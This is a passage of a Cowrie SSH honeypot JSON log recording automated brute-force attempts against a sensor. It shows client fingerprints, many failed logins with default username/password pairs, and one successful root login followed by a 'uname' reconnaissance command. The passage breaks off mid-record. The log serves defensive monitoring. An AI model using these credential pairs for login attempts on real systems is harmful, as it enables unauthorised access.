{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T03:23:58.288441Z","src_ip":"45.125.211.194","session":"511b00a4c219"}
{"eventid":"cowrie.session.connect","src_ip":"171.220.244.134","src_port":52464,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a9079f22aeb","protocol":"ssh","message":"New connection: 171.220.244.134:52464 (1.2.3.4:22) [session: 7a9079f22aeb]","sensor":"my-vps","timestamp":"2025-08-28T03:23:59.416257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T03:23:59.417221Z","src_ip":"171.220.244.134","session":"7a9079f22aeb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:23:59.500905Z","src_ip":"45.125.211.194","session":"511b00a4c219"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T03:23:59.652774Z","src_ip":"171.220.244.134","session":"7a9079f22aeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46111,"dst_ip":"1.2.3.4","dst_port":22,"session":"1238af3ef516","protocol":"ssh","message":"New connection: 212.227.235.229:46111 (1.2.3.4:22) [session: 1238af3ef516]","sensor":"my-vps","timestamp":"2025-08-28T03:24:05.808025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:24:05.826967Z","src_ip":"212.227.235.229","session":"1238af3ef516"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:24:06.224698Z","src_ip":"212.227.235.229","session":"1238af3ef516"}
{"eventid":"cowrie.login.failed","username":"support","password":"123456","message":"login attempt [support/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:06.629794Z","src_ip":"212.227.235.229","session":"1238af3ef516"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:07.807172Z","src_ip":"212.227.235.229","session":"1238af3ef516"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":47710,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a0c7a4d553b","protocol":"ssh","message":"New connection: 45.125.211.194:47710 (1.2.3.4:22) [session: 7a0c7a4d553b]","sensor":"my-vps","timestamp":"2025-08-28T03:24:12.059123Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:12.073477Z","src_ip":"45.125.211.194","session":"7a0c7a4d553b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:12.273671Z","src_ip":"45.125.211.194","session":"7a0c7a4d553b"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:13.108645Z","src_ip":"45.125.211.194","session":"7a0c7a4d553b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:14.320798Z","src_ip":"45.125.211.194","session":"7a0c7a4d553b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60644,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a7c3a5cfe2e","protocol":"ssh","message":"New connection: 212.227.125.160:60644 (1.2.3.4:22) [session: 0a7c3a5cfe2e]","sensor":"my-vps","timestamp":"2025-08-28T03:24:20.554622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:20.555807Z","src_ip":"212.227.125.160","session":"0a7c3a5cfe2e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:20.780351Z","src_ip":"212.227.125.160","session":"0a7c3a5cfe2e"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":53808,"dst_ip":"1.2.3.4","dst_port":22,"session":"4874fa117634","protocol":"ssh","message":"New connection: 194.233.79.134:53808 (1.2.3.4:22) [session: 4874fa117634]","sensor":"my-vps","timestamp":"2025-08-28T03:24:20.883426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:21.339415Z","src_ip":"194.233.79.134","session":"4874fa117634"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:21.340470Z","src_ip":"194.233.79.134","session":"4874fa117634"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:21.455572Z","src_ip":"212.227.125.160","session":"0a7c3a5cfe2e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:22.681127Z","src_ip":"212.227.125.160","session":"0a7c3a5cfe2e"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:25.457612Z","src_ip":"194.233.79.134","session":"4874fa117634"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42850,"dst_ip":"1.2.3.4","dst_port":22,"session":"d43cd9633c4b","protocol":"ssh","message":"New connection: 212.227.125.160:42850 (1.2.3.4:22) [session: d43cd9633c4b]","sensor":"my-vps","timestamp":"2025-08-28T03:24:26.371840Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:26.372755Z","src_ip":"212.227.125.160","session":"d43cd9633c4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:26.596417Z","src_ip":"212.227.125.160","session":"d43cd9633c4b"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:26.789700Z","src_ip":"194.233.79.134","session":"4874fa117634"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":35700,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbb847e61de6","protocol":"ssh","message":"New connection: 45.125.211.194:35700 (1.2.3.4:22) [session: bbb847e61de6]","sensor":"my-vps","timestamp":"2025-08-28T03:24:26.888517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:26.917113Z","src_ip":"45.125.211.194","session":"bbb847e61de6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:27.099082Z","src_ip":"45.125.211.194","session":"bbb847e61de6"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"123456","message":"login attempt [nginx/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:27.269901Z","src_ip":"212.227.125.160","session":"d43cd9633c4b"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:27.936366Z","src_ip":"45.125.211.194","session":"bbb847e61de6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:28.495751Z","src_ip":"212.227.125.160","session":"d43cd9633c4b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:29.147654Z","src_ip":"45.125.211.194","session":"bbb847e61de6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53288,"dst_ip":"1.2.3.4","dst_port":22,"session":"5fffee5fb11d","protocol":"ssh","message":"New connection: 212.227.125.160:53288 (1.2.3.4:22) [session: 5fffee5fb11d]","sensor":"my-vps","timestamp":"2025-08-28T03:24:32.142513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:32.143533Z","src_ip":"212.227.125.160","session":"5fffee5fb11d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:32.358911Z","src_ip":"212.227.125.160","session":"5fffee5fb11d"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher123","message":"login attempt [rancher/rancher123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:24:33.229180Z","src_ip":"212.227.125.160","session":"5fffee5fb11d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:34.447128Z","src_ip":"212.227.125.160","session":"5fffee5fb11d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35496,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb0402795753","protocol":"ssh","message":"New connection: 212.227.125.160:35496 (1.2.3.4:22) [session: fb0402795753]","sensor":"my-vps","timestamp":"2025-08-28T03:24:38.484382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:38.486053Z","src_ip":"212.227.125.160","session":"fb0402795753"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:24:38.702010Z","src_ip":"212.227.125.160","session":"fb0402795753"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:24:39.352142Z","src_ip":"212.227.125.160","session":"fb0402795753"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:24:39.852749Z","src_ip":"212.227.125.160","session":"fb0402795753"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:24:39.853501Z","src_ip":"212.227.125.160","session":"fb0402795753"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:40.071385Z","src_ip":"212.227.125.160","session":"fb0402795753"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:24:40.072404Z","src_ip":"212.227.125.160","session":"fb0402795753"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":15908,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b3ccca22e58","protocol":"ssh","message":"New connection: 45.125.211.194:15908 (1.2.3.4:22) [session: 9b3ccca22e58]","sensor":"my-vps","timestamp":"2025-08-28T03:24:41.847378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:24:41.854331Z","src_ip":"45.125.211.194","session":"9b3ccca22e58"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"m